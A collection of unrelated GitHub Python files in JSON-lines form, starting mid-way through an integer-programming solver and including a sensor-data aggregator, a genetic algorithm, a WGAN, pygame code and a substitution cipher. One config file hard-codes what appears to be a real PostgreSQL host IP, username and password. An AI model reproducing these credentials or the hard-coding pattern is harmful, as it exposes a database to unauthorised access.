{n}\".format(n=phase))\n keys_k = []\n keys_kp1 = []\n # Sum variables that end in node v at phase K\n for item in items_per_phase[phase]:\n valid_input_edge = GDN(item)[1]\n if int(valid_input_edge) == int(node):\n keys_k.append(item)\n # print(\"Actual Phase\")\n sum += pl.lpSum(lpvariables_per_phase[phase][i] for i in keys_k)\n # print(keys_k)\n # Sum all variables that not start at v at phase k+1\n for item_ in lpvariables_per_phase[phase + 1]:\n valid_input_edge_ = GDN(item_)[0]\n if int(node) != int(valid_input_edge_): # Restriction over other nodes\n keys_kp1.append(item_)\n # print(\"Next Phase\")\n # print(keys_kp1)\n sum += pl.lpSum(lpvariables_per_phase[phase + 1][j] for j in keys_kp1)\n count_const += 1\n prob += (\n sum <= rest,\n \"Continuity_Restriction_{p},{n}\".format(p=node, n=phase),\n )\n\n # 7) We force solution to start at Agent initial position\n force_init = pl.lpSum(lpvariables_init[i] for i in variables_init)\n force_init_r = pl.lpSum(lpvariables_per_phase[0][i] for i in items_per_phase[0])\n count_const += 1\n prob += (\n force_init >= force_init_r,\n \"Force_Initial\",\n )\n\n # Force consecutive phases\n # for phase in range(0,N-1):\n # force_k=lpSum(lpvariables_per_phase[phase][i] for i in items_per_phase[phase])\n # force_k_p_1 = lpSum(lpvariables_per_phase[phase+1][i] for i in items_per_phase[phase+1])\n # prob += (\n # force_k >= force_k_p_1,\n # \"Force_next_{p}\".format(p=phase),\n # )\n\n ##################################\n\n # The problem data is written to an .lp file\n prob.writeLP(\"ILP_Tree.lp\")\n # The problem is solved using PuLP's choice of Solver (Default is CBC: Coin or branch and cut)\n solver = pl.GUROBI_CMD(options=[(\"Method\", self.config['experiment']['method']),\n (\"NodefileStart\", self.config['experiment']['nodefilestart']),\n (\"Threads\", self.config['experiment']['threads']),\n (\"NodefileDir\", os.getcwd() + '/' + 'gurobi_log'),\n (\"PreSparsify\", self.config['experiment']['presparsify'])])\n tracing_start()\n start = tm.time()\n\n prob.solve(solver)\n\n end = tm.time()\n print(\"Time elapsed solving model {} milli seconds\".format((end - start) * 1000))\n peak = tracing_mem()\n print(\"Memory COnsumed by Model solver: {}\".format(peak))\n\n print(\"Solution Time\")\n print(prob.solutionTime)\n self.times.append(prob.solutionTime)\n\n # The status of the solution is printed to the screen\n print(\"Status:\", pl.LpStatus[prob.status])\n\n # Each of the variables is printed with it's resolved optimum value\n solution = {}\n for v in prob.variables():\n # print(v.name, \"=\", v.varValue)\n solution[v.name] = v.varValue\n\n # The optimised objective function value is printed to the screen\n print(\"Total Saved Trees = \", pl.value(prob.objective))\n self.saved.append(pl.value(prob.objective))\n\n # Nodes that are defended during solution\n sol_nodes = [k for k, v in solution.items() if v == 1]\n\n s = {}\n for u_v_x in sol_nodes:\n x_ = GDN(u_v_x)\n x = re.sub(r\"[\\_]\", \"\", x_[2])\n s[u_v_x] = int(x)\n\n sorted_sol = sorted(s.items(), key=operator.itemgetter(1))\n self.solutions.append(sorted_sol)\n self.n_restrictions.append(count_const)\n\n print('Total Constraints')\n print(self.n_restrictions)\n print('Total Variables')\n print(self.n_variables)\n\n def getSolution(self):\n return self.solutions\n\n def getTimes(self):\n return self.times\n\n def getSaved(self):\n return self.saved\n\n def getVariables_Restrictions(self):\n return self.n_variables, self.n_restrictions\n\n def getDegrees(self):\n return self.root_degree, self.max_degree","repo_name":"MauMontenegro/MFP_T_ip","sub_path":"solvers/ILP_MFF.py","file_name":"ILP_MFF.py","file_ext":"py","file_size_in_byte":30126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35124321918","text":"import configparser as parser\nimport json\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nfrom influxdb_client import InfluxDBClient\n\nclass DataAggrService:\n def __init__(self, DataAggrDao, influxDbUrl, influxDbToken, influxDbBucket, influxDbOrg, kafkaProducer):\n self.DataAggrDao = DataAggrDao\n self.influxDbUrl = influxDbUrl\n self.influxDbToken = influxDbToken\n self.influxDbBucket = influxDbBucket\n self.influxDbOrg = influxDbOrg\n self.kafkaProducer = kafkaProducer\n\n properties = parser.ConfigParser()\n properties.read('./config/application.ini')\n service_config = properties['SERVICE']\n self.service_config=service_config\n\n def locationCheck(self):\n result = {\"LOCATION\" : \"LOCATION_VALUE\"}\n return result\n\n def humTemperDataSend(self):\n influxDbClient=InfluxDBClient(url=self.influxDbUrl, token=self.influxDbToken, org=self.influxDbOrg)\n sensorData = self.DataAggrDao.checkHumTemSensor()\n if sensorData['Humidity'] is not None and sensorData['Temperature'] is not None:\n # print(self.service_config['APP_KEY'])\n send2InfluxData = [\"%s,host=%s temperature=%f\" % (self.service_config['GROUP_ID'], self.service_config['DEVICE_ID'], sensorData['Temperature']), \"%s,host=%s humid=%f\" % (self.service_config['GROUP_ID'],self.service_config['DEVICE_ID'], sensorData['Humidity'])]\n # send2InfluxData = [\"jpkim_home,host=raspberrypi temperature=%f\" % (sensorData['Temperature']), \"jpkim_home,host=raspberrypi humid=%f\" % (sensorData['Humidity'])]\n \n # print(send2InfluxData)\n write_api = influxDbClient.write_api(write_options=SYNCHRONOUS)\n write_api.write(self.influxDbBucket, self.influxDbOrg, send2InfluxData)\n influxDbClient.close()\n\n send2KafkaData = {'Humidity':sensorData['Humidity'], 'Temperature':sensorData['Temperature']}\n send2KafkaKey = {'GroupID':int(self.service_config['GROUP_ID']),'DeviceID': int(self.service_config['DEVICE_ID'])}\n print('SendData Key :',send2KafkaKey,'to Kafka Server :',send2KafkaData) \n self.kafkaProducer.send('soildata', key=json.dumps(send2KafkaKey).encode('utf-8'), value=send2KafkaData)\n self.kafkaProducer.flush()\n \n def npkDataSend(self):\n influxDbClient=InfluxDBClient(url=self.influxDbUrl, token=self.influxDbToken, org=self.influxDbOrg)\n sensorData = self.DataAggrDao.checkNpkSensor()\n if sensorData['Nitrogen'] is not None and sensorData['Phosphorus'] is not None and sensorData['Potassium'] is not None:\n send2InfluxData = [\"jpkim_home,host=%s Nitrogen=%f\" % (self.service_config['DEVICE_ID'], sensorData['Nitrogen']), \"jpkim_home,host=%s Phosphorus=%f\" % (self.service_config['DEVICE_ID'], sensorData['Phosphorus']), \"jpkim_home,host=%s Potassium=%f\" % (self.service_config['DEVICE_ID'], sensorData['Potassium'])]\n write_api = influxDbClient.write_api(write_options=SYNCHRONOUS)\n write_api.write(self.influxDbBucket, self.influxDbOrg, send2InfluxData)\n influxDbClient.close()\n \n\n\n\n","repo_name":"armyost/python-collector","sub_path":"service/DataAggr_service.py","file_name":"DataAggr_service.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42872374559","text":"\"\"\" Authors: Hadleigh Schwartz and Katie Dykstra. This program creates a genetic\nalgorithm that presents the user with a valid equation that solves to 23 and\nkeeps producing generations based on fitnesses until a valid equation that\nsolves to 23 is produced.\n\"\"\"\n\nfrom __future__ import print_function\nimport random\n\n\ndef random_pop():\n\t\"\"\"Cretaes initial population of 20\"\"\"\n\tinit_pop = []\n\n\tfor i in range(20):\n\t\tgenome = \"\"\n\n\t\tfor j in range(0,9):\n\t\t\trand = \"{0:04b}\".format(random.randint(0,13))[::-1]\n\t\t\tgenome += rand\n\n\t\tinit_pop.append(genome)\n\n\treturn init_pop\n\n\ndef genome_to_operators(genome):\n\t\"\"\"Converts from binary to raw function\"\"\"\n\tindivgenome = \"\"\n\ty = 0\n\n\tfor i in range(0,len(genome),4):\n\t\t\ty = int(int((genome[i:i + 4]),2))\n\t\t\tif y == 10:\n\t\t\t\tindivgenome += \"+\"\n\n\t\t\telif y == 11:\n\t\t\t\tindivgenome += \"-\"\n\n\t\t\telif y == 12:\n\t\t\t\tindivgenome += \"*\"\n\n\t\t\telif y == 13:\n\t\t\t\tindivgenome += \"/\"\n\n\t\t\telif y < 10:\n\t\t\t\tindivgenome += str(y)\n\n\treturn indivgenome\n\n\ndef convert_to_valid(genome):\n\t\"\"\"Converts the raw functions to a valid expression\"\"\"\n\ttry:\n\t\t\n\t\tvalid_expression = \"\"\n\t\tcounter = 0\n\t\tchar_type = None\n\t\tprev_type = \"operator\"\n\n\t\tfor x,character in enumerate(genome):\n\t\t\tif (genome[x] == \"+\" or genome[x] == \"-\" or genome[x] == \"*\" \n\t\t\t\tor genome[x] == \"/\"):\n\t\t\t\tchar_type = \"operator\"\n\n\t\t\telse:\n\t\t\t\tchar_type = \"operand\"\n\n\t\t\tif prev_type != char_type:\n\t\t\t\tvalid_expression += genome[x]\n\n\t\t\tprev_type = char_type\n\n\t\t\"\"\"Make sure last character is not an operator\"\"\"\n\t\tif (valid_expression[len(valid_expression) - 1] == \"+\" or valid_expression[len(valid_expression) - 1] == \"-\"\n\t\t\tor valid_expression[len(valid_expression) - 1] == \"*\" or \n\t\t\tvalid_expression[len(valid_expression) - 1] == \"/\"):\n\t\t\tvalid_expression = valid_expression[0:-1]\t\t\n\n\t\treturn valid_expression\n\n\texcept:\n\t\treturn \"fail\"\n\t\n\ndef solve_valid(validexpression):\n\t\"\"\"Solves valid expression\"\"\"\n\tanswer = 0\n\n\tif len(validexpression) == 0:\n\t\treturn answer\n\n\telse:\n\t\tanswer = float(validexpression[0:1])\n\t\tvalidexpression = validexpression[1:len(validexpression)]\n\n\twhile len(validexpression) != 0:\n\t\toperator_operand_pair = validexpression[0:2]\n\n\t\tif operator_operand_pair == '/0':\n\t\t\treturn 0\n\n\t\tvalidexpression = validexpression[2:len(validexpression)]\n\t\tanswer = eval(str(answer) + operator_operand_pair)\n\n\treturn answer\n\n\ndef test_fitness(numbers):\n\t\"\"\"Determines the fitness of each member of the population\"\"\"\n\tfitnesses = []\n\n\tfor num in numbers:\n\t\tfitnesses.append(round(1.0/abs(23.0 - num),4))\n\n\treturn fitnesses\n\n\ndef breeding_recombination(indices_two_mates, pop):\n\t\"\"\"Swaps bits of two mates and replaces them in the current population\"\"\"\n\tmate1 = list(pop[indices_two_mates[0]])\n\tmate2 = list(pop[indices_two_mates[1]])\n\trate = .4\n\trandNumb = random.random()\n\ttemp = \"\"\n\n\tfor i in range(len(mate1)):\n\n\t\tif i % 2 == 0:\n\t\t\ttemp = mate1[i]\n\t\t\tmate1[i] = mate2[i]\n\t\t\tmate2[i] = temp\n\n\tif randNumb < rate:\n\t\tlocation = random.randint(0, 8)\n\t\t\n\t\tfor i in range(4):\n\t\t\tmate1[location*4 + i] = str(random.randint(0,1))\n\t\t\n\tmate2 = ''.join([str(item) for item in mate2])\n\tmate1 = ''.join([str(item) for item in mate1])\n\n\tbred = [mate2, mate1]\n\n\treturn(bred)\n\n\ndef selection(fitnesses, pop):\n\t\"\"\" Selects two mates at a time based on passed in fitness values.\"\"\"\n\tpopulation = []\n\tvalues = fitnesses\n\tindices = list(range(len(fitnesses)))\n\n\tfor k in range(10):\n\t\tmates = [0, 0]\n\n\t\tif len(values) == 2:\n\t\t\tmates[0] = indices[0]\n\t\t\tmates[1] = indices[1]\n\t\t\t\n\t\telif len(values) == 0:\n\t\t\tbreak\n\n\t\telse:\n\t\t\tf = sum(values)\n\t\t\tp = f / 2.0\n\t\t\tstart = random.random() * p\n\t\t\tindex = 0\n\t\t\tfitness = values[index]\n\t\t\t\n\t\t\tfor i in range(2):\n\n\t\t\t\tpointer = start + i * p\n\t\t\t\tif fitness >= pointer:\n\t\t\t\t\t\n\t\t\t\t\tif i == 1 and index != 0:\n\t\t\t\t\t\tmates[i] = indices[index - 1]\n\t\t\t\t\t\tdel values[index - 1]\n\t\t\t\t\t\tdel indices[index - 1]\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tmates[i] = indices[index]\n\t\t\t\t\t\tdel values[index]\n\t\t\t\t\t\tdel indices[index]\n\n\t\t\t\telse:\n\t\t\t\t\tindex += 1\n\n\t\t\t\t\twhile index < len(values):\n\t\t\t\t\t\tfitness += values[index]\n\n\t\t\t\t\t\tif fitness >= pointer:\n\t\t\t\t\n\t\t\t\t\t\t\tif i == 1 and index != 0:\n\t\t\t\t\t\t\t\tmates[i] = indices[index - 1]\n\t\t\t\t\t\t\t\tdel values[index - 1]\n\t\t\t\t\t\t\t\tdel indices[index - 1]\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tmates[i] = indices[index]\n\t\t\t\t\t\t\t\tdel values[index]\n\t\t\t\t\t\t\t\tdel indices[index]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tindex += 1\n\t\t\t\t\n\t\tbred = breeding_recombination(mates, pop)\n\t\tmate1 = bred[0]\n\t\tpopulation.append(mate1)\n\t\tmate2 = bred[1]\n\t\tpopulation.append(mate2)\n\n\treturn population\n\n\ndef main():\n\t\"\"\"Executes the above functions\"\"\"\n\tinit_pop = random_pop()\n\tcurrentpop = init_pop\n\tgeneration = 0\n\tcheck = 0\n\n\twhile check == 0:\n\t\tpop_numbers = []\n\n\t\tfor genome in currentpop:\n\t\t\ttooperators = genome_to_operators(genome)\n\t\t\tprint (\"Raw function \" + tooperators)\n\t\t\tvalid = convert_to_valid(tooperators)\n\t\t\t\n\t\t\tif valid == \"fail\":\n\t\t\t\tnew_genome = \"\"\n\n\t\t\t\tfor j in range(0,9):\n\t\t\t\t\trand = \"{0:04b}\".format(random.randint(0,13))[::-1]\n\t\t\t\t\tnew_genome += rand\n\n\t\t\t\tgenome = new_genome\n\t\t\t\ttooperators = genome_to_operators(genome)\n\t\t\t\tprint (\"Raw function \" + tooperators)\n\t\t\t\tvalid = convert_to_valid(tooperators)\n\n\t\t\tprint(\"Corrected: \" + valid)\n\t\t\tsolved = solve_valid(valid)\n\t\t\tprint(\"Solved: \" + str(solved))\n\t\t\tpop_numbers.append(solved)\n\n\t\t\tif solved == 23:\n\t\t\t\tprint(\"DONE on Generation \" + str(generation))\n\t\t\t\tcheck = 1\n\t\t\t\treturn\n\n\t\t\tprint(\"Generation \" + str(generation))\n\n\t\tfitnesses = test_fitness(pop_numbers)\n\t\tnewpop = selection(fitnesses, currentpop)\n\t\tcurrentpop = newpop\n\t\tgeneration += 1\n\n\nmain()\n\n\n\n","repo_name":"Hadleigh-Schwartz/genetic-algorithm","sub_path":"ga2.py","file_name":"ga2.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16950886359","text":"import pygame\r\n\r\nclass Ship:\r\n \"\"\"information about ship.\"\"\"\r\n def __init__(self, tp_game):\r\n \"\"\"attribute about ship.\"\"\"\r\n self.screen = tp_game.screen\r\n self.settings = tp_game.settings\r\n self.screen_rect = tp_game.screen.get_rect()\r\n\r\n self.image = pygame.image.load('images/ship.bmp')\r\n self.rect = self.image.get_rect()\r\n\r\n self.rect.midleft = self.screen_rect.midleft\r\n\r\n self.y = float(self.rect.y)\r\n\r\n self.up = False\r\n self.down = False\r\n\r\n def update(self):\r\n \"\"\"This method helpfull for ship up and down on screen.\"\"\"\r\n if self.up and self.rect.top > 0:\r\n self.y -= self.settings.ship_speed\r\n if self.down and self.rect.bottom < self.screen_rect.bottom:\r\n self.y += self.settings.ship_speed\r\n\r\n self.rect.y = self.y\r\n\r\n def blitme(self):\r\n \"\"\"this method combine image and screen.\"\"\"\r\n self.screen.blit(self.image, self.rect)\r\n\r\n def center_ship(self):\r\n \"\"\"center the ship on the screen.\"\"\"\r\n self.rect.midleft = self.screen_rect.midleft\r\n self.y = float(self.rect.y)\r\n","repo_name":"noshah/Python_Practice","sub_path":"TargetPractice/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72450892392","text":"# -*- coding: utf-8 -*-\ntry:\n from urlparse import parse_qs\nexcept ImportError:\n from cgi import parse_qs\n\nfrom .data_structures import EnvironHeader\nfrom .cookies import parse_cookie\nfrom .form import parse_form_data\nfrom .utils import lazy_property\n\n\ndef get_host(environ):\n \"\"\"Get real host\n If there is HTTP_X_FORWARDED_HOST in environ, use the value of it.\n \"\"\"\n if 'HTTP_X_FORWARDED_HOST' in environ:\n return environ['HTTP_X_FORWARDED_HOST']\n elif 'HTTP_HOST' in environ:\n return environ['HTTP_HOST']\n\n request_host = environ['SERVER_NAME']\n if (environ['wsgi.url_scheme'], environ['SERVER_PORT']) not in \\\n (('https', '443'), ('http', '80')):\n request_host += ':' + environ['SERVER_PORT']\n\n return request_host\n\n\nclass BaseRequest(object):\n\n def __init__(self, environ):\n self.environ = environ\n\n @lazy_property\n def method(self):\n return self.environ.get('REQUEST_METHOD', 'get').upper()\n\n @lazy_property\n def header(self):\n return EnvironHeader(self.environ)\n\n @lazy_property\n def cookies(self):\n \"\"\"return the cookie.\n The cookie is a dict, user can get the key and value in dict way.\n The key is the cookie name, the value is the cookie value, not the instance of Morsel\n\n The cookies should be like this:\n\n {'session_id': '1', 'test': 'xxx'}\n \"\"\"\n return parse_cookie(self.environ)\n\n @lazy_property\n def request_addr(self):\n \"\"\"Get request address\"\"\"\n # TODO: Add support get real request address when use proxy(HTTP_X_FORWARDED_FOR)\n return self.environ['REMOTE_ADDR']\n\n @lazy_property\n def host(self):\n \"\"\"Get real host address.\"\"\"\n return get_host(self.environ)\n\n @lazy_property\n def path(self):\n path = '/' + self.environ.get('PATH_INFO', '').lstrip('/')\n # TODO 需要改变编码方式\n return path\n\n @lazy_property\n def content_type(self):\n return self.environ.get('CONTENT_TYPE', '')\n\n @lazy_property\n def request_params(self):\n \"\"\"return the request params. Example:\n 1. user try to visit http://example.com/?key=value&a=b, method is GET:\n It will get:\n param = {'key': 'value', 'a':'b'}\n\n 2. user try to visit http://example.com/?key=value&a=b&a=c, method is GET:\n It will get:\n param = {'key': 'value', 'a':['b', 'c']}\n \"\"\"\n raw_data = parse_qs(\n self.environ.get('QUERY_STRING', ''), keep_blank_values=True\n )\n params = {}\n for key, value in raw_data.iteritems():\n if len(value) == 1:\n params[key] = value[0]\n else:\n params[key] = value\n return params\n\n @lazy_property\n def form(self):\n if self.method not in ('POST', 'PUT'):\n return {}\n\n d = self.__dict__\n if '_form' not in d:\n d['_form'], d['_file'] = parse_form_data(self.environ)\n return self._form\n\n @lazy_property\n def file(self):\n if self.method not in ('POST', 'PUT'):\n return {}\n\n d = self.__dict__\n if '_file' not in d:\n d['_form'], d['_file'] = parse_form_data(self.environ)\n return self._file\n\n\nclass Request(BaseRequest):\n pass\n","repo_name":"EricQAQ/Puck","sub_path":"puck/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"15105110398","text":"import tensorflow as tf\nfrom tensorflow.keras import layers\n\nfrom models.critic import Critic\nfrom models.generator import Generator\n\nclass WGAN(tf.keras.Model):\n def __init__(self, config):\n super(WGAN, self).__init__()\n self.batch_size = config[\"batch_size\"]\n self.latent_dims = config[\"latent_dims\"]\n self.critic_steps= config[\"critic_extra_train_steps\"]\n self.grad_penalty_weight = config[\"grad_penalty_weight\"]\n self.critic = Critic(config)\n self.generator = Generator(config)\n\n def compile(self, d_optimizer, g_optimizer, c_loss_fn, g_loss_fn):\n super().compile()\n self.d_optimizer = d_optimizer\n self.g_optimizer = g_optimizer\n self.c_loss_fn = c_loss_fn\n self.g_loss_fn = g_loss_fn\n self.d_loss_metric = tf.keras.metrics.Mean(name=\"d_loss\")\n self.g_loss_metric = tf.keras.metrics.Mean(name=\"g_loss\")\n\n def gradient_penalty(self, real_images, fake_images):\n alpha = tf.random.normal([self.batch_size, 1, 1, 1], 0.0, 1.0)\n interpolated = real_images * alpha - fake_images * (1-alpha)\n\n with tf.GradientTape() as tape:\n tape.watch(interpolated)\n # 1. get the descriminator output for the interpolated image\n pred = self.critic(interpolated, training=True)\n\n # 2. Calculate the gradient w.r.t to this interpolated image\n grads = tape.gradient(pred, [interpolated])[0]\n\n # 3. calculate the norm of the gradients\n norm = tf.sqrt(tf.reduce_sum(tf.square(grads), axis=[1, 2, 3]))\n gp = tf.reduce_mean((norm - 1)**2)\n return gp\n\n\n @tf.function\n def train_generator(self, real_images):\n noise_vectors = tf.random.normal(shape=[self.batch_size, self.latent_dims])\n\n with tf.GradientTape() as tape:\n generated_images = self.generator(noise_vectors)\n critic_logits = self.critic(generated_images)\n generator_loss = self.g_loss_fn(critic_logits)\n\n grads = tape.gradient(generator_loss, self.generator.trainable_variables)\n self.g_optimizer.apply_gradients(zip(grads, self.generator.trainable_variables))\n self.g_loss_metric.update_state(generator_loss)\n\n @tf.function\n def train_critic(self, real_images):\n for _ in range(self.critic_steps):\n noise_vectors = tf.random.normal(shape=[self.batch_size, self.latent_dims])\n\n generated_images = self.generator(noise_vectors)\n\n # Train the critic\n with tf.GradientTape() as tape:\n fake_images_logits = self.critic(generated_images)\n real_images_logits = self.critic(real_images)\n\n critic_cost = self.c_loss_fn(real_images_logits, fake_images_logits)\n gp = self.gradient_penalty(real_images, generated_images)\n c_loss = critic_cost + gp * self.grad_penalty_weight\n\n grads = tape.gradient(c_loss, self.critic.trainable_variables)\n self.d_optimizer.apply_gradients(zip(grads, self.critic.trainable_variables))\n self.d_loss_metric.update_state(c_loss)\n\n @tf.function\n def train_step(self, real_images):\n self.train_generator(real_images)\n self.train_critic(real_images)\n\n return {\n \"generator_loss\": self.g_loss_metric.result(),\n \"discriminator_loss\": self.d_loss_metric.result()\n }\n","repo_name":"jmattdale/generative_models","sub_path":"w_gan/models/wgan.py","file_name":"wgan.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72835177833","text":"def encripta():\r\n \r\n import string\r\n ALFABETO = string.ascii_lowercase\r\n plaintext = input(\"Ingrese el texto a encriptar: \")\r\n \r\n llave = input(\"Ingrese la llave: \")\r\n ciphertext =\"\"\r\n if len(llave)!=26:\r\n print(\"La llave debe tener 26 caracteres\")\r\n encripta()\r\n elif not llave.isalpha():\r\n print(\"La llave tiene caracteres no alfabeticos\") \r\n encripta() \r\n else:\r\n for l in plaintext:\r\n \r\n if l.lower() in ALFABETO:\r\n c = ALFABETO.find(l.lower())\r\n \r\n if l.isupper():\r\n ciphertext += ciphertext.join(llave[c].upper())\r\n else:\r\n ciphertext += ciphertext.join(llave[c].lower())\r\n else:\r\n ciphertext += ciphertext.join(l)\r\n \r\n print(\"Texto plano: \", plaintext)\r\n print(\"Texto encriptado: \", ciphertext)\r\n print(\"0\")\r\n\r\nencripta()","repo_name":"ClaudiaTacillo/Python_final","sub_path":"Semana 1/sustitution.py","file_name":"sustitution.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15344394150","text":"institution_types = [\n 'Any',\n 'Hospital',\n 'Dentistry',\n 'Primary Care Clinic ',\n 'Urgent Care Clinic',\n 'Convenience Clinic',\n 'Imaging Center',\n 'Laboratory',\n 'Supplier',\n 'Specialty Center',\n 'Other'\n]\n\ninsurer_types = [\n 'Any',\n 'United Healthcare',\n 'BlueCross BlueShield PPO/EPO',\n 'Aetna Open Choice PPO',\n 'Other'\n]\n\nPGHOST : str ='104.154.251.225'\nPGDATABASE : str ='postgres'\nPGUSER : str ='postgres'\nPGPASSWORD : str ='goober'\n","repo_name":"siegelzc/medview","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"74270022311","text":"import pygame, os, sys\n\nfrom images import IMAGESDICT\n\n\n# Screen scales :\nFPS = 30 # frames per second to update the screen\nWINWIDTH = 800 # width of the program's window, in pixels\nWINHEIGHT = 800 # height in pixels\nHALF_WINWIDTH = int(WINWIDTH / 2)\nHALF_WINHEIGHT = int(WINHEIGHT / 2)\n\n# Start Screen of the game \ndef startScreen():\n \"\"\"Display the start screen (which has the title and instructions)\n until the player presses a key. Returns None.\"\"\"\n\n # Position the title image.\n titleRect = IMAGESDICT['title'].get_rect()\n topCoord = 50 # topCoord tracks where to position the top of the text\n titleRect.top = topCoord\n titleRect.centerx = HALF_WINWIDTH\n topCoord += titleRect.height\n\n # Unfortunately, Pygame's font & text system only shows one line at\n # a time, so we can't use strings with \\n newline characters in them.\n # So we will use a list with each line in it.\n instructionText = ['Push the stars over the marks.',\n 'Arrow keys to move, WASD for camera control, P to change character.',\n 'Backspace to reset level, Esc to quit.',\n 'N for next level, B to go back a level.']\n\n # Start with drawing a blank color to the entire window:\n DISPLAYSURF.fill(BGCOLOR)\n\n # Draw the title image to the window:\n DISPLAYSURF.blit(IMAGESDICT['title'], titleRect)\n\n # Position and draw the text.\n for i in range(len(instructionText)):\n instSurf = BASICFONT.render(instructionText[i], 1, TEXTCOLOR)\n instRect = instSurf.get_rect()\n topCoord += 10 # 10 pixels will go in between each line of text.\n instRect.top = topCoord\n instRect.centerx = HALF_WINWIDTH\n topCoord += instRect.height # Adjust for the height of the line.\n DISPLAYSURF.blit(instSurf, instRect)\n\n while True: # Main loop for the start screen.\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n return # user has pressed a key, so return.\n\n # Display the DISPLAYSURF contents to the actual screen.\n pygame.display.update()\n FPSCLOCK.tick()\n\n\n\n# Here we need to create the screen where the map is constructed\n\n\n\n\n\ndef main():\n pass\n\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\nif __name__ == __main__:\n main()","repo_name":"BarriBarri20/EscapeTheMaze","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1482498573","text":"import tcod as libtcod\n\nfrom enum import Enum\n\n\nclass RenderOrder(Enum):\n CORPSE = 1\n ITEM = 2\n ACTOR = 3\n\n\ndef get_names_under_mouse(mouse, entities, fov_map):\n (x, y) = (mouse.cx, mouse.cy)\n\n names = [entity.title() for entity in entities\n if entity.x == x and entity.y == y and libtcod.map_is_in_fov(fov_map, entity.x, entity.y)]\n names = ', '.join(names)\n return names.capitalize()\n\n\ndef render_bar(panel, x, y, total_width, name, value, maximum, bar_color, back_color):\n bar_width = int(float(value) / maximum * total_width)\n\n libtcod.console_set_default_background(panel, back_color)\n libtcod.console_rect(panel, x, y, total_width, 1, False, libtcod.BKGND_SCREEN)\n\n libtcod.console_set_default_background(panel, bar_color)\n if bar_width > 0:\n libtcod.console_rect(panel, x, y, bar_width, 1, False, libtcod.BKGND_SCREEN)\n\n libtcod.console_set_default_foreground(panel, libtcod.white)\n libtcod.console_print_ex(panel, int(x + total_width / 2), y,\n libtcod.BKGND_NONE, libtcod.CENTER,\n '{0}: {1}/{2}'.format(name, value, maximum))\n\n\n# noinspection PyTypeChecker\ndef render_all(con, panel, entities, player, game_map, fov_map, fov_recompute,\n message_log, screen_width, screen_height, bar_width,\n panel_height, panel_y, mouse, colors):\n draw_map(con, game_map, fov_map, fov_recompute, colors)\n\n entities_in_render_order = sorted(entities, key=lambda x: x.render_order.value)\n\n for entity in entities_in_render_order:\n draw_entity(con, entity, fov_map)\n\n libtcod.console_blit(con, 0, 0, screen_width, screen_height, 0, 0, 0)\n \n libtcod.console_set_default_background(panel, libtcod.black)\n libtcod.console_clear(panel)\n\n y = 1\n for message in message_log.messages:\n libtcod.console_set_default_foreground(panel, message.color)\n libtcod.console_print_ex(panel, message_log.x, y, libtcod.BKGND_NONE, libtcod.LEFT, message.text)\n y += 1\n\n render_bar(panel, 1, 1, bar_width, 'HP',\n player.combat.hp, player.combat.max_hp,\n libtcod.light_red, libtcod.darker_red)\n\n libtcod.console_set_default_foreground(panel, libtcod.light_grey)\n libtcod.console_print_ex(panel, 1, 0, libtcod.BKGND_NONE, libtcod.LEFT,\n get_names_under_mouse(mouse, entities, fov_map))\n\n libtcod.console_blit(panel, 0, 0, screen_width, panel_height, 0, 0, panel_y)\n\n\ndef clear_all(con, entities):\n for entity in entities:\n clear_entity(con, entity)\n\n\ndef draw_map(con, game_map, fov_map, fov_recompute, colors):\n if fov_recompute:\n for y in range(game_map.height):\n for x in range(game_map.width):\n visible = libtcod.map_is_in_fov(fov_map, x, y)\n wall = game_map.tiles[x][y].block_sight\n\n color = libtcod.Color(0, 0, 0)\n if visible:\n if wall:\n color = colors.get('light_wall')\n else:\n color = colors.get('light_ground')\n game_map.tiles[x][y].explored = True\n elif game_map.tiles[x][y].explored: \n if wall:\n color = colors.get('dark_wall')\n else:\n color = colors.get('dark_ground')\n draw_tile(con, x, y, color)\n\n\ndef draw_tile(con, x, y, color):\n libtcod.console_set_char_background(con, x, y, color, libtcod.BKGND_SET)\n\n\ndef draw_entity(con, entity, fov_map):\n if libtcod.map_is_in_fov(fov_map, entity.x, entity.y):\n libtcod.console_set_default_foreground(con, entity.color)\n libtcod.console_put_char(con, entity.x, entity.y, entity.char, libtcod.BKGND_NONE)\n\n\ndef clear_entity(con, entity):\n libtcod.console_put_char(con, entity.x, entity.y, ' ', libtcod.BKGND_NONE)\n","repo_name":"Kehvarl/roguelike_tutorial_2019","sub_path":"render_functions.py","file_name":"render_functions.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38537689635","text":"# Дан текстовый файл, требуется переписать в новый файл все строки исходного файла в обратном порядке.\nbuff = []\nSTEP = 128\nfin = open('input', 'rb')\nfout = open('output', 'wb')\n\npos = fin.seek(0, 2)\nn = STEP\nwhile pos != 0:\n 